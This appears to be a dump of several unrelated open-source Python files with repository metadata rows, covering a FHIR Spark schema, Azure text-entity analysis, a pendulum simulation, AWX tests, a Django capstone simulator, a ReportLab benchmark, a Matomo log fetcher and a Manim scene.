extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The value of the measured amount. The value includes an implicit precision in
# the presentation of the value.
StructField(
"value",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# How the value should be understood and represented - whether the actual value
# is greater or less than the stated value due to measurement issues; e.g. if
# the comparator is "<" , then the real value is < stated value.
StructField("comparator", StringType(), True),
# A human-readable form of the unit.
StructField("unit", StringType(), True),
# The identification of the system that provides the coded form of the unit.
StructField(
"system",
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A computer processable form of the unit in some unit representation system.
StructField(
"code",
codeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 46.983696
| 97
| 0.575824
|
4a07c9b4a8081aa1f2c3f5af8cd2748db63dc82a
| 3,490
|
py
|
Python
|
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | null | null | null |
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | 1
|
2019-03-28T00:47:28.000Z
|
2019-10-08T23:11:38.000Z
|
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | 1
|
2021-05-13T04:42:16.000Z
|
2021-05-13T04:42:16.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# Author: Graham.Williams@microsoft.com
#
# A command line script to analyze text.
#
# ml analyze entities <sentence>
#
# https://docs.microsoft.com/en-us/azure/cognitive-services/text-analytics/
# quickstarts/python-sdk
#
# ----------------------------------------------------------------------
# Setup
# ----------------------------------------------------------------------
# Import the required libraries.
import sys
import argparse
from utils import request_priv_info
# pip3 install --upgrade --user azure-cognitiveservices-language-textanalytics
from azure.cognitiveservices.language.textanalytics import TextAnalyticsClient
from msrest.authentication import CognitiveServicesCredentials
# ----------------------------------------------------------------------
# Parse command line arguments
# ----------------------------------------------------------------------
option_parser = argparse.ArgumentParser(add_help=False)
option_parser.add_argument(
'sentence',
nargs="*",
help='sentence to analyse')
args = option_parser.parse_args()
# ----------------------------------------------------------------------
# Request subscription key and endpoint from user.
# ----------------------------------------------------------------------
key, endpoint = request_priv_info()
credentials = CognitiveServicesCredentials(key)
client = TextAnalyticsClient(endpoint=endpoint, credentials=credentials)
# ------------------------------------------------------------------------
# Helper function
# ------------------------------------------------------------------------
def analyseText(txt):
documents = [{'id': '1', 'text': txt}]
response = client.detect_language(documents=documents)
l = response.documents[0]
dl = l.detected_languages[0]
lang = dl.iso6391_name
documents = [{'id': '1', 'language': lang, 'text': txt}]
response = client.entities(documents=documents)
for es in response.documents:
for e in es.entities:
m = e.matches[0]
print(f"{e.name},", end="")
print(f"{e.type},", end="")
if e.sub_type == None:
print(",", end="")
else:
print(f"{e.sub_type},", end="")
if m.entity_type_score != None:
print(f"{m.entity_type_score:0.2f},", end="")
else:
print("0.00,", end="")
print(f"{m.offset},{m.length},", end="")
if m.wikipedia_score == None:
print(",,,")
else:
print(f"{m.wikipedia_score:0.2f},{e.wikipedia_language},{e.wikipedia_id},{e.wikipedia_url}")
# ------------------------------------------------------------------------
# Obtain text and analyze.
# ------------------------------------------------------------------------
txt = " ".join(args.sentence)
if txt != "":
analyseText(txt)
elif not sys.stdin.isatty():
for txt in sys.stdin.readlines():
analyseText(txt)
print()
else:
print("Enter text to be analysed. Quit with Empty or Ctrl-d.\n")
prompt = '> '
try:
txt = input(prompt)
except EOFError:
print()
sys.exit(0)
while txt != '':
analyseText(txt)
try:
print()
txt = input(prompt)
except EOFError:
print()
sys.exit(0)
| 29.083333
| 108
| 0.488252
|
4a07cad3729bb6d70305250b4bad59c6c3986e8b
| 5,478
|
py
|
Python
|
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
"""
Title: pendulum_pygame
Author: [jadenhensley](https://github.com/jadenhensley)
Last modified: 2021/10/18
Description: Pendulum project, built using pygame and math modules.
Title: wheelPole
Author: [aimetz](https://github.com/aimetz)
Last modified: 2021/04/20
Title: gym/gym/envs/classic_control/pendulum.py
Author: [openai](https://github.com/openai)
Last modified: 2021/10/31
"""
import pygame
from math import pi, sin, cos
import numpy as np
class Pendulum:
def __init__(self, rend):
# paras according to paper [LQR and MPC controller design and comparison for a stationary self-balancing bicycle robot with a reaction wheel]
self.theta_rod = 0
self.theta_wheel = 0
self.theta_rod_dot = 0
self.theta_wheel_dot = 0
self.len_rod = 0.5 # 0.25
self.len_wheel = 0.9 # 0.35
self.rad_wheel = 0.1
self.mass_rod = 0.1 # 20.1
self.mass_wheel = 0.05 # 3.7
self.momentum_rod = self.mass_rod*self.len_rod**2/12
self.momentum_wheel = self.mass_wheel*self.rad_wheel**2/2 #depends on wheel shape
self.dt = 0.001
self.gravity = 9.8
self.max_speed = 100
self.torque = 0
self.voltage = 0
width = 800
height = 600
self.origin_x = width//2
self.origin_y = height//2
self.POS = np.array([self.origin_x, self.origin_y])
if rend:
pygame.init()
self.screen = pygame.display.set_mode((width, height))
pygame.display.set_caption("Pendulum Simulation")
pygame.font.init()
self.debug_font = pygame.font.SysFont('Bauhuas 93', 30)
self.hint_font = pygame.font.SysFont('Bauhaus 93', 26)
#print("font")
def reset(self):
roll_range = 20 #in degree
self.theta_rod = (np.random.random()*2-1)*roll_range*pi/180
#self.theta_wheel = 0
self.theta_rod_dot = 0
self.theta_wheel_dot = 0
state = np.array([self.theta_rod, self.theta_rod_dot, self.theta_wheel_dot], dtype=np.float32)
return state
def render(self, eval_run):
#torque = action
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
SCALE = 100
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GRAY = (128, 128, 128)
tip_x = self.POS[0]+self.len_wheel*sin(self.theta_rod)*SCALE
tip_y = self.POS[1]-self.len_wheel*cos(self.theta_rod)*SCALE
POSTIP = np.array([tip_x, tip_y])
POSWHEEL = np.array(([tip_x+self.rad_wheel*sin(self.theta_wheel)*SCALE, tip_y+self.rad_wheel*cos(self.theta_wheel)*SCALE]))
#print(POSTIP)
self.screen.fill(WHITE)
pygame.draw.line(self.screen, BLACK, self.POS, POSTIP, 10)
pygame.draw.circle(self.screen, GRAY, POSTIP, self.rad_wheel*2*SCALE)
pygame.draw.circle(self.screen, RED, POSWHEEL, self.rad_wheel*2*SCALE//5)
img = self.hint_font.render("torque : % .4f" % self.torque, True, BLACK)
img2 = self.hint_font.render("voltage: % .4f" % self.voltage, True, BLACK)
img3 = self.hint_font.render("Evaluation Run %d" % eval_run, True, BLACK)
self.screen.blit(img, (self.origin_x, self.origin_y / 2 - 50))
self.screen.blit(img2, (self.origin_x, self.origin_y / 2 - 30))
self.screen.blit(img3, (self.origin_x / 5, self.origin_y / 2 - 50))
pygame.display.update()
def step(self, action):
q1 = self.theta_rod
q2 = self.theta_wheel
q1_dot = self.theta_rod_dot
q2_dot = self.theta_wheel_dot
l1 = self.len_rod
l2 = self.len_wheel
m1 = self.mass_rod
m2 = self.mass_wheel
I1 = self.momentum_rod
I2 = self.momentum_wheel
dt = self.dt
g = self.gravity
gear_ratio = 25
kt = 0.0229
ke = 0.0229
R = 0.71
action_scale = 12
#torque = action
voltage = action * action_scale
torque = gear_ratio*kt/R*(voltage-ke*gear_ratio*q2_dot)
Ip = m1*l1**2+m2*l2**2+I1+I2
a = (m1*l1+m2*l2)*g*sin(angle_normalize(q1))
newq1_dot = q1_dot + ((a-torque)/(Ip-I2))*dt
#print("rod ang_vel",newq1_dot)
#newq1_dot = np.clip(newq1_dot, -self.max_speed, self.max_speed)
#print("rod ang_vel",newq1_dot)
newq1 = angle_normalize(angle_normalize(q1) + newq1_dot * dt)
#print("rod angle",newq1)
newq2_dot = q2_dot + ((torque*Ip-a*I2)/I2/(Ip-I2))*dt
newq2_dot = np.clip(newq2_dot, -self.max_speed, self.max_speed)
#print("wheel ang_vel",newq2_dot)
newq2 = angle_normalize(angle_normalize(q2) + newq2_dot * dt)
#print("wheel angle",newq2)
#print("torque",torque)
#print("\n")
#print([torque, newq1[0], newq2[0], newq1_dot[0], newq2_dot[0]])
state = np.array([newq1[0], newq1_dot[0], newq2_dot[0]], dtype=np.float32)
self.theta_rod = newq1
self.theta_wheel = newq2
self.theta_rod_dot = newq1_dot
self.theta_wheel_dot = newq2_dot
self.torque = torque
self.voltage = voltage
costs = 100 * angle_normalize(q1)**2 + 0.1 * q1_dot**2 + 0.001 * voltage**2
return state, -costs, False, {}
def close(self):
pygame.display.quit()
pygame.quit()
def angle_normalize(th):
return ((th+pi)%(2*pi))-pi
| 34.45283
| 149
| 0.606061
|
4a07cafd2d288e185520b6aac23a4f9fd46f699b
| 3,701
|
py
|
Python
|
awx/main/tests/unit/models/test_ha.py
|
tongtie/awx
|
1f34d4c1346cb2d79f0f13727d9d823d7df9ad6f
|
[
"Apache-2.0"
] | 1
|
2020-03-03T10:15:32.000Z
|
2020-03-03T10:15:32.000Z
|
awx/main/tests/unit/models/test_ha.py
|
tongtie/awx
|
1f34d4c1346cb2d79f0f13727d9d823d7df9ad6f
|
[
"Apache-2.0"
] | 35
|
2019-04-04T16:53:20.000Z
|
2021-06-02T04:31:23.000Z
|
awx/main/tests/unit/models/test_ha.py
|
akus062381/awx
|
0ac3a377fdb74acb2ecbeb286bd1998d6d72a42a
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from unittest import mock
from unittest.mock import Mock
from decimal import Decimal
from awx.main.models import InstanceGroup, Instance
@pytest.mark.parametrize('capacity_adjustment', [0.0, 0.25, 0.5, 0.75, 1, 1.5, 3])
def test_capacity_adjustment_no_save(capacity_adjustment):
inst = Instance(hostname='test-host', capacity_adjustment=Decimal(capacity_adjustment), capacity=0, cpu_capacity=10, mem_capacity=1000)
assert inst.capacity == 0
assert inst.capacity_adjustment == capacity_adjustment # sanity
inst.set_capacity_value()
assert inst.capacity > 0
assert inst.capacity == (float(inst.capacity_adjustment) * abs(inst.mem_capacity - inst.cpu_capacity) + min(inst.mem_capacity, inst.cpu_capacity))
def T(impact):
j = mock.Mock(spec_set=['task_impact', 'capacity_type'])
j.task_impact = impact
j.capacity_type = 'execution'
return j
def Is(param):
"""
param:
[remaining_capacity1, remaining_capacity2, remaining_capacity3, ...]
[(jobs_running1, capacity1), (jobs_running2, capacity2), (jobs_running3, capacity3), ...]
"""
instances = []
if isinstance(param[0], tuple):
for (jobs_running, capacity) in param:
inst = Mock()
inst.capacity = capacity
inst.jobs_running = jobs_running
inst.node_type = 'execution'
instances.append(inst)
else:
for i in param:
inst = Mock()
inst.remaining_capacity = i
inst.node_type = 'execution'
instances.append(inst)
return instances
class TestInstanceGroup(object):
@pytest.mark.parametrize(
'task,instances,instance_fit_index,reason',
[
(T(100), Is([100]), 0, "Only one, pick it"),
(T(100), Is([100, 100]), 0, "Two equally good fits, pick the first"),
(T(100), Is([50, 100]), 1, "First instance not as good as second instance"),
(T(100), Is([50, 0, 20, 100, 100, 100, 30, 20]), 3, "Pick Instance [3] as it is the first that the task fits in."),
(T(100), Is([50, 0, 20, 99, 11, 1, 5, 99]), None, "The task don't a fit, you must a quit!"),
],
)
def test_fit_task_to_most_remaining_capacity_instance(self, task, instances, instance_fit_index, reason):
ig = InstanceGroup(id=10)
instance_picked = ig.fit_task_to_most_remaining_capacity_instance(task, instances)
if instance_fit_index is None:
assert instance_picked is None, reason
else:
assert instance_picked == instances[instance_fit_index], reason
@pytest.mark.parametrize(
'instances,instance_fit_index,reason',
[
(Is([(0, 100)]), 0, "One idle instance, pick it"),
(Is([(1, 100)]), None, "One un-idle instance, pick nothing"),
(Is([(0, 100), (0, 200), (1, 500), (0, 700)]), 3, "Pick the largest idle instance"),
(Is([(0, 100), (0, 200), (1, 10000), (0, 700), (0, 699)]), 3, "Pick the largest idle instance"),
(Is([(0, 0)]), None, "One idle but down instance, don't pick it"),
],
)
def test_find_largest_idle_instance(self, instances, instance_fit_index, reason):
def filter_offline_instances(*args):
return filter(lambda i: i.capacity > 0, instances)
ig = InstanceGroup(id=10)
instances_online_only = filter_offline_instances(instances)
if instance_fit_index is None:
assert ig.find_largest_idle_instance(instances_online_only) is None, reason
else:
assert ig.find_largest_idle_instance(instances_online_only) == instances[instance_fit_index], reason
| 40.228261
| 150
| 0.636044
|
4a07cc6a3df5f8ffe171c1e54131fb6c7ae69d78
| 601
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class FacenormalsepsilonValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name="facenormalsepsilon",
parent_name="streamtube.lighting",
**kwargs
):
super(FacenormalsepsilonValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
max=kwargs.pop("max", 1),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "style"),
**kwargs
)
| 30.05
| 80
| 0.607321
|
4a07ccbb39f5c328690fe7feca5b30efa8f5e709
| 5,778
|
py
|
Python
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 2
|
2020-11-09T03:48:36.000Z
|
2021-07-02T14:30:09.000Z
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 132
|
2020-04-25T15:57:56.000Z
|
2022-03-10T19:15:51.000Z
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 1
|
2020-10-24T16:15:57.000Z
|
2020-10-24T16:15:57.000Z
|
import logging
from datetime import datetime, timezone
from urllib.parse import urljoin
from django.db import models
from django.conf import settings
from portal.hackathons.models import random_path
from portal.users.models import User
logger = logging.getLogger(__name__)
class Capstone(models.Model):
name = models.CharField(max_length=1024)
scoring = models.FileField(upload_to=random_path, null=True, blank=True)
def __str__(self):
return self.name
def score(self):
# Load scoring
glob = {}
script = self.scoring.read().decode()
exec(script, glob)
for api in self.studentapi_set.all():
# noinspection PyUnresolvedReferences,PyUnboundLocalVariable
score = glob["score"](self, api)
api.score = score
api.save()
class StudentApi(models.Model):
capstone = models.ForeignKey(Capstone, models.CASCADE)
user = models.ForeignKey(User, models.CASCADE)
url = models.CharField(max_length=255, blank=True)
score = models.FloatField(default=0)
class Simulator(models.Model):
capstone = models.ForeignKey(
Capstone, models.CASCADE, related_name="simulators"
)
name = models.CharField(max_length=1024)
started = models.DateTimeField(null=True)
ends = models.DateTimeField(null=True)
interval = models.DurationField(null=True)
# example: predict
path = models.CharField(max_length=255)
STATUS_CHOICES = (
("stopped", "stopped"),
("start", "start"),
("started", "started"),
("paused", "paused"),
("reset", "reset"),
("ended", "ended"),
)
status = models.CharField(
choices=STATUS_CHOICES, default="queued", max_length=64
)
def start(self):
if self.status == "start": # Started manually through the admin
logger.info("Starting simulator: %s", self)
now = datetime.now(timezone.utc)
self.started = now
self.status = "started"
self.save()
self.create_due_datapoints(now)
def create_due_datapoints(self, starts):
logger.info("Creating due datapoints for %s", self)
self.due_datapoints.all().delete()
datapoints = self.datapoints.order_by("id").all()
student_apis = StudentApi.objects.filter(
capstone=self.capstone
).exclude(url="")
interval = (self.ends - starts) / datapoints.count()
# Assuming one producer we are queueing BLOCK_SIZE requests per cycle
# to queue enough requests we need to queue at least
# (PRODUCER_INTERVAL / interval) * number of students
required_requests_per_cycle = student_apis.count() * (
settings.PRODUCER_INTERVAL / interval.total_seconds()
)
logger.debug("Block size: %s", settings.BLOCK_SIZE)
logger.debug("Required requests: %s", required_requests_per_cycle)
if settings.BLOCK_SIZE < required_requests_per_cycle:
raise RuntimeError(
f"Number of queued requests per cycle is not enough, "
f"required {required_requests_per_cycle}",
f"consumed {settings.BLOCK_SIZE}",
)
self.interval = interval
self.save()
for student_api in student_apis:
self.add_student_api(student_api, datapoints, starts)
def add_student_api(self, student_api, datapoints, starts=None):
logger.info(
"Creating due datapoints for simulator %s student %s",
self,
student_api.student,
)
due = starts or datetime.now(timezone.utc)
interval = (self.ends - starts) / datapoints.count()
logger.debug("Starting: %s", due)
logger.debug("Ending: %s", self.ends)
logger.debug("Count: %s", datapoints.count())
logger.debug("Interval: %s", interval)
url = urljoin(student_api.url, self.path)
due_datapoints = []
for datapoint in datapoints:
due_datapoints.append(
DueDatapoint(
simulator=self,
datapoint=datapoint,
user=student_api.student,
due=due,
url=url,
)
)
due += interval
DueDatapoint.objects.bulk_create(due_datapoints)
def __str__(self):
return self.name
def reset(self):
if self.status == "reset":
logger.info("Resetting simulator %s", self)
self.due_datapoints.all().delete()
self.status = "stopped"
self.save()
class Datapoint(models.Model):
simulator = models.ForeignKey(
Simulator, models.CASCADE, related_name="datapoints"
)
data = models.TextField(blank=True)
outcome = models.TextField(blank=True)
class DueDatapoint(models.Model):
simulator = models.ForeignKey(
Simulator, models.CASCADE, related_name="due_datapoints"
)
url = models.TextField()
datapoint = models.ForeignKey(Datapoint, models.CASCADE)
user = models.ForeignKey(User, models.CASCADE)
due = models.DateTimeField(null=True)
STATE_CHOICES = (
("due", "due"),
("queued", "queued"),
("success", "success"),
("fail", "fail"),
)
state = models.CharField(
choices=STATE_CHOICES, default="due", max_length=64
)
response_content = models.TextField(blank=True)
response_exception = models.TextField(blank=True)
response_traceback = models.TextField(blank=True)
response_elapsed = models.FloatField(null=True)
response_status = models.IntegerField(null=True)
response_timeout = models.BooleanField(default=False)
| 31.922652
| 77
| 0.624264
|
4a07ccdffe18e08c8f4b3b3a5a5949c3f078e928
| 4,323
|
py
|
Python
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 8
|
2018-11-01T10:40:18.000Z
|
2021-12-16T03:20:48.000Z
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 2
|
2015-03-16T18:32:58.000Z
|
2019-03-20T07:17:04.000Z
|
demos/odyssey/odyssey.py
|
sbluen/reportlab
|
98758940eeae30db80bbc9c555e42b8c89b86be8
|
[
"BSD-3-Clause"
] | 26
|
2015-03-16T18:27:04.000Z
|
2022-03-25T10:08:33.000Z
|
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
__version__=''' $Id$ '''
___doc__=''
#odyssey.py
#
#Demo/benchmark of PDFgen rendering Homer's Odyssey.
#results on my humble P266 with 64MB:
# Without page compression:
# 239 pages in 3.76 seconds = 77 pages per second
# With textOut rather than textLine, i.e. computing width
# of every word as we would for wrapping:
# 239 pages in 10.83 seconds = 22 pages per second
# With page compression and textLine():
# 239 pages in 39.39 seconds = 6 pages per second
from reportlab.pdfgen import canvas
import time, os, sys
#find out what platform we are on and whether accelerator is
#present, in order to print this as part of benchmark info.
try:
import _rl_accel
ACCEL = 1
except ImportError:
ACCEL = 0
from reportlab.lib.units import inch, cm
from reportlab.lib.pagesizes import A4
#precalculate some basics
top_margin = A4[1] - inch
bottom_margin = inch
left_margin = inch
right_margin = A4[0] - inch
frame_width = right_margin - left_margin
def drawPageFrame(canv):
canv.line(left_margin, top_margin, right_margin, top_margin)
canv.setFont('Times-Italic',12)
canv.drawString(left_margin, top_margin + 2, "Homer's Odyssey")
canv.line(left_margin, top_margin, right_margin, top_margin)
canv.line(left_margin, bottom_margin, right_margin, bottom_margin)
canv.drawCentredString(0.5*A4[0], 0.5 * inch,
"Page %d" % canv.getPageNumber())
def run(verbose=1):
if sys.platform[0:4] == 'java':
impl = 'Jython'
else:
impl = 'Python'
verStr = '%d.%d' % (sys.version_info[0:2])
if ACCEL:
accelStr = 'with _rl_accel'
else:
accelStr = 'without _rl_accel'
print 'Benchmark of %s %s %s' % (impl, verStr, accelStr)
started = time.time()
canv = canvas.Canvas('odyssey.pdf', invariant=1)
canv.setPageCompression(1)
drawPageFrame(canv)
#do some title page stuff
canv.setFont("Times-Bold", 36)
canv.drawCentredString(0.5 * A4[0], 7 * inch, "Homer's Odyssey")
canv.setFont("Times-Bold", 18)
canv.drawCentredString(0.5 * A4[0], 5 * inch, "Translated by Samuel Burton")
canv.setFont("Times-Bold", 12)
tx = canv.beginText(left_margin, 3 * inch)
tx.textLine("This is a demo-cum-benchmark for PDFgen. It renders the complete text of Homer's Odyssey")
tx.textLine("from a text file. On my humble P266, it does 77 pages per secondwhile creating a 238 page")
tx.textLine("document. If it is asked to computer text metrics, measuring the width of each word as ")
tx.textLine("one would for paragraph wrapping, it still manages 22 pages per second.")
tx.textLine("")
tx.textLine("Andy Robinson, Robinson Analytics Ltd.")
canv.drawText(tx)
canv.showPage()
#on with the text...
drawPageFrame(canv)
canv.setFont('Times-Roman', 12)
tx = canv.beginText(left_margin, top_margin - 0.5*inch)
for fn in ('odyssey.full.txt','odyssey.txt'):
if os.path.isfile(fn):
break
data = open(fn,'r').readlines()
for line in data:
#this just does it the fast way...
tx.textLine(line.rstrip())
#page breaking
y = tx.getY() #get y coordinate
if y < bottom_margin + 0.5*inch:
canv.drawText(tx)
canv.showPage()
drawPageFrame(canv)
canv.setFont('Times-Roman', 12)
tx = canv.beginText(left_margin, top_margin - 0.5*inch)
#page
pg = canv.getPageNumber()
if verbose and pg % 10 == 0:
print 'formatted page %d' % canv.getPageNumber()
if tx:
canv.drawText(tx)
canv.showPage()
drawPageFrame(canv)
if verbose:
print 'about to write to disk...'
canv.save()
finished = time.time()
elapsed = finished - started
pages = canv.getPageNumber()-1
speed = pages / elapsed
fileSize = os.stat('odyssey.pdf')[6] / 1024
print '%d pages in %0.2f seconds = %0.2f pages per second, file size %d kb' % (
pages, elapsed, speed, fileSize)
import md5
print 'file digest: %s' % md5.md5(open('odyssey.pdf','rb').read()).hexdigest()
if __name__=='__main__':
quiet = ('-q' in sys.argv)
run(verbose = not quiet)
| 29.408163
| 109
| 0.647698
|
4a07cd41ba079b24efc37fcd542877b1a58c8803
| 3,977
|
py
|
Python
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 1
|
2019-10-22T11:29:31.000Z
|
2019-10-22T11:29:31.000Z
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 1
|
2021-06-01T23:49:20.000Z
|
2021-06-01T23:49:20.000Z
|
fetch_missing_matomo_requests.py
|
alphagov/verify-matomo-tool
|
b3461f56c38ec4c004b3d3c73d26b986154136ac
|
[
"MIT"
] | 2
|
2019-08-29T14:01:57.000Z
|
2021-04-10T19:34:26.000Z
|
from datetime import datetime, timedelta, timezone
import os
import boto3
import time
from _decimal import Decimal
NUM_OF_DAYS = 'NUM_OF_DAYS'
START_DATE = 'START_DATE'
def print_unset_env_variable_error_and_exit(environment_variable):
print(environment_variable, " environment variable is not set.")
exit(1)
def validate_environment_variables():
if os.getenv(START_DATE) is None:
print_unset_env_variable_error_and_exit(START_DATE)
if os.getenv(NUM_OF_DAYS) is None:
print_unset_env_variable_error_and_exit(NUM_OF_DAYS)
def get_start_date():
try:
return datetime.strptime(os.getenv(START_DATE), '%Y-%m-%dT%H:%M:%S%z')
except ValueError:
print("START_DATE has an invalid date and time format. It should be in %Y-%m-%dT%H:%M:%S%z")
exit(1)
def get_number_of_days():
try:
return int(os.getenv(NUM_OF_DAYS))
except ValueError:
print("NUM_OF_DAYS has an invalid format. It should be in integers only")
exit(1)
def wait_for_the_query_to_complete(response):
queryId = response['queryId']
status = 'Running'
while status != 'Complete':
response = client.get_query_results(queryId=queryId)
status = response['status']
time.sleep(1)
return response
def run_query(start_timestamp, end_timestamp):
return client.start_query(
logGroupName='matomo',
startTime=int(start_timestamp.timestamp() * 1000),
endTime=int(end_timestamp.timestamp() * 1000),
queryString=
"""fields @message
| sort @timestamp asc
| filter @logStream like /matomo-nginx/
| filter status!='200'
| filter status!='204'
| filter user_agent!='ELB-HealthChecker/2.0'
| filter path like /idsite=1/
| filter path like /rec=1/""",
limit=10000
)
def write_requests_to_a_file(response, start_date, end_date, output_filename):
with open(output_filename, 'a+') as f:
for messages in response['results']:
for message in messages:
if message['field'] == '@message':
f.write(message['value'] + '\n')
break
if __name__ == '__main__':
validate_environment_variables()
client = boto3.client('logs')
start_date = get_start_date()
num_of_days = get_number_of_days()
end_date = start_date + timedelta(days=num_of_days) + timedelta(microseconds=-1)
OUTPUT_FILENAME = start_date.strftime('%Y%m%d') + '_' + end_date.strftime('%Y%m%d') + '_matomo_requests.json'
if os.path.exists(OUTPUT_FILENAME):
os.remove(OUTPUT_FILENAME)
for days in range(0, get_number_of_days()):
current_date = start_date + timedelta(days=(days))
end_date = current_date + timedelta(days=1, microseconds=-1)
start_timestamp = current_date.replace(tzinfo=timezone.utc).timestamp()
end_timestamp = end_date.replace(tzinfo=timezone.utc).timestamp()
duration = (end_date - current_date).total_seconds()
offset = 60 * 5
num_of_iterations = int(duration / offset)
for i in range(num_of_iterations):
response = run_query(datetime.utcfromtimestamp(start_timestamp),
(datetime.utcfromtimestamp((start_timestamp + offset)) + timedelta(microseconds=-1)))
response = wait_for_the_query_to_complete(response)
write_requests_to_a_file(response, start_date, end_date, OUTPUT_FILENAME)
start_timestamp = start_timestamp + offset
if Decimal(duration) / Decimal(offset) % Decimal(1) != Decimal(0):
response = run_query(datetime.utcfromtimestamp(start_timestamp),
(datetime.utcfromtimestamp((start_timestamp + offset)) + timedelta(microseconds=-1)))
response = wait_for_the_query_to_complete(response)
write_requests_to_a_file(response, start_date, end_date, OUTPUT_FILENAME)
| 35.828829
| 118
| 0.665829
|
4a07cdabb48f3e641cbfa7a14b9a8d8c7a9719b8
| 574
|
py
|
Python
|
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
2021-04-Python-SEA-ENGRSL-Workshops/Workshop_1-Python-for-Automation/s06a_Activity.py
|
shawnduong/manimations
|
1d36d9d1e7dff90a1a8da1e687ef442f750e29c5
|
[
"MIT"
] | null | null | null |
from manim import *
class s06a_Activity(Scene):
def construct(self):
mainTitle = Text("Activity: Automate Work Tasks")
subtitleA = Text("Prepare to split into groups").scale(0.75)
subtitleB = Text("and gain hands-on experience!").scale(0.75)
mainTitle.shift(0.25*UP)
subtitleA.next_to(mainTitle, DOWN)
subtitleB.next_to(subtitleA, DOWN)
actors = [mainTitle, subtitleA, subtitleB]
self.play(Write(mainTitle))
self.wait(1)
self.play(Write(subtitleA))
self.play(Write(subtitleB))
self.wait(3)
self.play(*[FadeOut(actor) for actor in actors])
| 22.96
| 63
| 0.71777
|
4a07cec93de9105014339fe3755d5dc199389df5
| 183
|
py
|
Python
|
library/demo/main.py
|
park-sungmoo/jquery.flowchart_ultide
|
